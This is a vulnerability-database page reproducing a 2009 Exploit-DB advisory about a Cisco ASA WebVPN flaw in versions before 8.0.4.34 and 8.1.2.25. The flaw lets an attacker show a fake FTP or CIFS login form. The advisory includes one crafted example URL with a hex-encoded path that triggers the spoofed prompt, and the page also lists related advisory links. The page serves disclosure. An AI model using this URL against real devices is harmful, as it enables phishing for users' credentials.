Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbDavid ByrneEDB-ID:33054
HistoryMay 24, 2009 - 12:00 a.m.

Cisco Adaptive Security Appliance 8.x - Web VPN FTP or CIFS Authentication Form Phishing

2009-05-2400:00:00
David Byrne
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/35475/info

Cisco Adaptive Security Appliance (ASA) is prone to a vulnerability that can aid in phishing attacks.

An attacker can exploit this issue to display a fake login window that's visually similar to the device's login window, which may mislead users.

This issue is tracked by Cisco Bug ID CSCsy80709.

The attacker can exploit this issue to set up phishing attacks. Successful exploits could aid in further attacks.

Versions prior to ASA 8.0.4.34 and 8.1.2.25 are vulnerable.


The following example is available:

/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a

Related

prion 1
cvelist 1
nvd 1
cve 1
cisco 1
securityvulns 2
packetstorm 1
openvas 1
prion
prion
Design/Logic Flaw
2009-06-25 17:30:00
cvelist
cvelist
CVE-2009-1203
2009-06-25 17:00:00
nvd
nvd
CVE-2009-1203
2009-06-25 17:30:00
cve
cve
CVE-2009-1203
2009-06-25 17:30:00
cisco
cisco
Cisco ASA Adaptive Security Appliance Clientless SSL VPN CIFS and FTP Credential Theft Vulnerability
2009-06-24 15:51:07
securityvulns
securityvulns
Trustwave's SpiderLabs Security Advisory TWSL2009-002
2009-06-25 00:00:00
Cisco ASA Web VPN multiple security vulnerabilities
2009-06-25 00:00:00
packetstorm
packetstorm
Cisco ASA Web VPN Vulnerabilities
2009-06-25 00:00:00
openvas
openvas
Ubuntu USN-789-1 (gst-plugins-good0.10)
2009-06-30 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:33054
prion1cvelist1nvd1cve1cisco1securityvulns2packetstorm1openvas1